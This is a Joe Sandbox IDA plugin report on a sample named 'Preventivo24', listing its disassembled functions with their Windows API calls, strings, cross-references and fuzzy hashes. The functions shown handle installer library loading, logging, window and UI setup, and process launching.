Function 00EC25F0 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 372libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00EC2718
GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00EC272A
GetProcAddress.KERNEL32(00000000,ShutdownEmbeddedUI), ref: 00EC2738
GetProcAddress.KERNEL32(00000000,EmbeddedUIHandler), ref: 00EC2747

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Strings

SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll', xrefs: 00EC2679
InitializeEmbeddedUI, xrefs: 00EC2724
69aaef70, xrefs: 00EC285E
21.3.1, xrefs: 00EC283A
EmbeddedUIHandler, xrefs: 00EC273E
INAN, xrefs: 00EC2625
ShutdownEmbeddedUI, xrefs: 00EC2730
build , xrefs: 00EC284F

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressProc$Heap$AllocateLibraryLoadProcess
String ID: build $21.3.1$69aaef70$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
API String ID: 230625546-1630969157
Opcode ID: d939d3f4a9bd96b62427423020a15850aa48250eeea14734fd6d532d543749e9
Instruction ID: f8f465d789fbd7eb3d38c8617f769128987a7c75f3c6f03ceb4b6ab1eaaef18e
Opcode Fuzzy Hash: d939d3f4a9bd96b62427423020a15850aa48250eeea14734fd6d532d543749e9
Instruction Fuzzy Hash: 9CD1E175E002099FCB18EF64C955BAEBBB5FF48714F14422DE825B7381EB35AA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E91280 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 282libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,B5580983,00000000,?,?,?,?,?,?,?,?,?,?,?,B5580983), ref: 00E91303
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00E91309
LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,01142730,00000000,00000000,00000000), ref: 00E914CB

Strings

CoIncrementMTAUsage, xrefs: 00E913AA
DllGetActivationFactory, xrefs: 00E9150E
.dll, xrefs: 00E914B2
combase.dll, xrefs: 00E912FE, 00E913AF
RoGetActivationFactory, xrefs: 00E912F9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: LibraryLoad$AddressProc
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 1469910268-2454113998
Opcode ID: 0045f95ad7b7d8ee59c699c314cf7f3db65592818d838011be5ffc3251cbcd24
Instruction ID: 5b5aa919a1109112ce51abacb61eeaf626f967039d18c3e44401a86499e06f14
Opcode Fuzzy Hash: 0045f95ad7b7d8ee59c699c314cf7f3db65592818d838011be5ffc3251cbcd24
Instruction Fuzzy Hash: EFB18A70D0021AEFCF24EFA8D845BAEBBB5EF58704F1581A9E811B7290DB709D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FC68A0 Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 213COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,B5580983,?), ref: 00FC6937
SymSetSearchPath.IMAGEHLP(B5580983,?,B5580983,?), ref: 00FC6B98

Strings

MODULE_BASE_ADDRESS, xrefs: 00FC75C7
%hs:%ld, xrefs: 00FC6E34
*** Stack Trace (x86) ***, xrefs: 00FC7457
SymFromAddr, xrefs: 00FC732E
-> , xrefs: 00FC717C
<--------------------MORE--FRAMES-------------------->, xrefs: 00FC751D
[0x%.8Ix] , xrefs: 00FC7581
Dbghelp.dll, xrefs: 00FC7333
%hs(), xrefs: 00FC706A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FileModuleNamePathSearch
String ID: *** Stack Trace (x86) ***$ -> $%hs()$%hs:%ld$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
API String ID: 1980563475-1582651777
Opcode ID: 4b0b82a32e67fc5e1a8efe948051d18c34aa3aef73f20f59a491c10af2ba6fff
Instruction ID: 71b762190e66d66b7d4f7e23b1f2d8dfe5be5c71dcd81a5e2e6f1462c5ea5929
Opcode Fuzzy Hash: 4b0b82a32e67fc5e1a8efe948051d18c34aa3aef73f20f59a491c10af2ba6fff
Instruction Fuzzy Hash: 9491B971D04569CFCB28DF24CD46BECB7B4AB4A324F1082EAE559A7291DB345E84CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00FCC6B0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 441libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00FCC816
GetProcAddress.KERNEL32(00000000), ref: 00FCC81D
GetCurrentProcess.KERNEL32(?,00000000,?,?,?,00000000), ref: 00FCC857

Strings

kernel32, xrefs: 00FCC811
An acceptable version was found., xrefs: 00FCCB7F, 00FCCB80
Searching for:, xrefs: 00FCC959
Undefined, xrefs: 00FCCB64
IsWow64Process2, xrefs: 00FCC80C
Wrong OS or Os language for:, xrefs: 00FCCC0F
Search result:, xrefs: 00FCCAF9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: An acceptable version was found.$IsWow64Process2$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
API String ID: 4190356694-1658165007
Opcode ID: 0355dce7238610539ee5d02700bd953ea0d553a622a5f3c376e737a72576a8e5
Instruction ID: 2c029188b1edb7ebf26bdd128daaba2f0df551742582156f79c6d3c864b9a2ea
Opcode Fuzzy Hash: 0355dce7238610539ee5d02700bd953ea0d553a622a5f3c376e737a72576a8e5
Instruction Fuzzy Hash: F3029171D0060ADFDB14DFA8CA46BAEB7B2FF44324F14421DE429A7290DB35AD46DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EBC270 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 231windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,B5580983), ref: 00EBC2F8

Part of subcall function 00E9A370: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00E9A3B2

SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00EBC403
SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00EBC417
SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00EBC42C
SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00EBC441
SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00EBC458
GetWindowRect.USER32(?,?), ref: 00EBC48A
SendMessageW.USER32(00000000,00000412,00000000), ref: 00EBC4E6
SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00EBC4FA

Strings

tooltips_class32, xrefs: 00EBC2F2

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$Window$CreateLongRect
String ID: tooltips_class32
API String ID: 1954517558-1918224756
Opcode ID: a9408a551d6b761ea92f5bf79abdc443a28e34747e51135023688153041a619f
Instruction ID: 4b17cab4a37ee96994d978ce3fc1383ceb03589f2ea93f4e158e47e06d430f44
Opcode Fuzzy Hash: a9408a551d6b761ea92f5bf79abdc443a28e34747e51135023688153041a619f
Instruction Fuzzy Hash: BA915DB1A01219AFDB14CFA5CC55BEEBBF9FB48300F10852AF516EB294D774A904CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF65C0 Relevance: 16.7, APIs: 11, Instructions: 214fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(011D0080,B5580983,-00000001), ref: 00FF65FC
EnterCriticalSection.KERNEL32(-00000001,B5580983,-00000001), ref: 00FF6609
WriteFile.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF663B
FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF6644
WriteFile.KERNEL32(00000000,?,?,?,00000000,01142700,00000001,?,?,B5580983,00000000), ref: 00FF66DC
FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF66E5
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,B5580983,00000000), ref: 00FF6728
FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF6731
WriteFile.KERNEL32(00000000,000000FF,?,?,00000000,011456A4,00000002,?,?,B5580983,00000000), ref: 00FF679E
FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF67A7
LeaveCriticalSection.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF67E6

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$BuffersFlushWrite$CriticalSection$EnterFindInitializeLeaveResource
String ID:
API String ID: 1900893598-0
Opcode ID: 49788ab709614c1c545e516c8d1e07266c266473dd52f4b3546f63a1b55d340d
Instruction ID: 920b2b228235c4dfac012ee118ee32e4c2b768e053c290351edde4ea0edede8e
Opcode Fuzzy Hash: 49788ab709614c1c545e516c8d1e07266c266473dd52f4b3546f63a1b55d340d
Instruction Fuzzy Hash: E271AA35A00208AFDB15DF68C949BADBBB5EF08324F1441A8F921E73A1DB359D01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7D60 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 308libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA1CC0: GetLastError.KERNEL32(B5580983,01100BFD,01100BFD,01100BFD,?,00000000,010F23FD,000000FF,?,80070057,00000000,?,?,01100BFD,00FB90AA,00000000), ref: 00FA1D31

GetProcAddress.KERNEL32(?,GetPackagePath), ref: 00FF7F1F
GetProcAddress.KERNEL32(?,GetPackagePath), ref: 00FF7F88
GetLastError.KERNEL32(?,?,01100EE5,000000FF,?,00FD68D0,?,?,?,?,?,?,00000000), ref: 00FF7FB2
FreeLibrary.KERNEL32(?,?,?,00000000,00000000,?,?,01100EE5,000000FF), ref: 00FF80B4

Strings

neutral, xrefs: 00FF7E26
x64, xrefs: 00FF7E0A
GetPackagePath, xrefs: 00FF7F19, 00FF7F82
Kernel32.dll, xrefs: 00FF7D8D
x86, xrefs: 00FF7DDC

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressErrorLastProc$FreeLibrary
String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
API String ID: 329358263-4043905686
Opcode ID: 32e8e6e4e18f0e218393ffa93826610fe1b50db2a14f6b3dd75fa208ac357850
Instruction ID: feafd6e256cdcd3fea431e20fafd62d117ec05efae69d956b1790d9b624d940e
Opcode Fuzzy Hash: 32e8e6e4e18f0e218393ffa93826610fe1b50db2a14f6b3dd75fa208ac357850
Instruction Fuzzy Hash: 95C15C74A002099FDB18DFA8C998AADFBB1FF08314F148169E915E73A1EB759D05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E98A00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(011D536C,B5580983,00000000,?,?,?,?,?,?,00E98169,010B530D,000000FF), ref: 00E98A3D
LoadCursorW.USER32(00000000,00007F00), ref: 00E98AB8
LoadCursorW.USER32(00000000,00007F00), ref: 00E98B60
LeaveCriticalSection.KERNEL32(011D536C), ref: 00E98BB3

Strings

WM_ATLGETCONTROL, xrefs: 00E98A52
0, xrefs: 00E98B45
WM_ATLGETHOST, xrefs: 00E98A43
AtlAxWin140, xrefs: 00E98A6B, 00E98AD3
AtlAxWinLic140, xrefs: 00E98B1D, 00E98B77

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CriticalCursorLoadSection$EnterLeave
String ID: 0$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 3727441302-283551416
Opcode ID: 75b6f260d164d0bc609699940507683867345ab0d242df6892446867fb67974f
Instruction ID: 0a935f11b536311599e90e5e3a92f2123ddf54c286214cf9cf75b022a7681e69
Opcode Fuzzy Hash: 75b6f260d164d0bc609699940507683867345ab0d242df6892446867fb67974f
Instruction Fuzzy Hash: ED5138B4C06318AFDB14DFA8D949BDEBFF8BB08704F14012AE411B7284EBB44545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01095381 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 01095759

Strings

:, xrefs: 0109544C
p, xrefs: 0109549A
p, xrefs: 0109547E
p, xrefs: 010954E0
f, xrefs: 01095493
f, xrefs: 010954D9
f, xrefs: 01095477

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: __aulldiv
String ID: :$f$f$f$p$p$p
API String ID: 3732870572-1434680307
Opcode ID: 87b9d343ca3209c7fc88f3f47259edb2ffb4044beba4fd5f19aa44b67a5d1869
Instruction ID: 25b69cd92cf6a4c9a517c4bc345eccaf07e9cad5b1342999fc2f494700f93cc3
Opcode Fuzzy Hash: 87b9d343ca3209c7fc88f3f47259edb2ffb4044beba4fd5f19aa44b67a5d1869
Instruction Fuzzy Hash: FE02A375A01108DBDF22CF6AEC646DDBBB2FB04B24FA84157D5957B280E7308E84EB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FDD3F0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 320processfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FDECE0: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000010), ref: 00FDED0D

Part of subcall function 00E933C0: GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 00E934B7
Part of subcall function 00E933C0: GetProcAddress.KERNEL32(00000000), ref: 00E934BE

GetFileAttributesW.KERNEL32(?,?,00000003,?,00000001,?,00000000,00000000), ref: 00FDD598
SetFileAttributesW.KERNEL32(?,00000080), ref: 00FDD5AB
CopyFileW.KERNEL32(?,?,00000000), ref: 00FDD5B8

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00FDD6FA
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00FDD710
CloseHandle.KERNEL32(?), ref: 00FDD731
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00FDD744

Strings

"%s" %s, xrefs: 00FDD62E

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FileWow64$AttributesHandleModuleProcessRedirectionRevert$AddressCloseCopyCreateHeapNameProc
String ID: "%s" %s
API String ID: 2074715946-1070868581
Opcode ID: 221ef68091f76fb6a5451d6e39399981c4123d8f5a44d35316ea06b69fef7774
Instruction ID: 804fd67d52868a8cc24f279da256d4bab374d1a8ed53198e2c3ce33c4844fc43
Opcode Fuzzy Hash: 221ef68091f76fb6a5451d6e39399981c4123d8f5a44d35316ea06b69fef7774
Instruction Fuzzy Hash: F5D19F31D00648DFDB14DFA8CD05BADBBB2BF48324F288259E425AB395DB74A945DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00E96A00 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 283memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00E96A3E
SysAllocString.OLEAUT32(?), ref: 00E96A56
VariantInit.OLEAUT32(?), ref: 00E96A91
VariantClear.OLEAUT32(?), ref: 00E96AFA
VariantClear.OLEAUT32(?), ref: 00E96B08
VariantClear.OLEAUT32(?), ref: 00E96B16
VariantClear.OLEAUT32(?), ref: 00E96B27

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Strings

<body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>, xrefs: 00E96BAB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

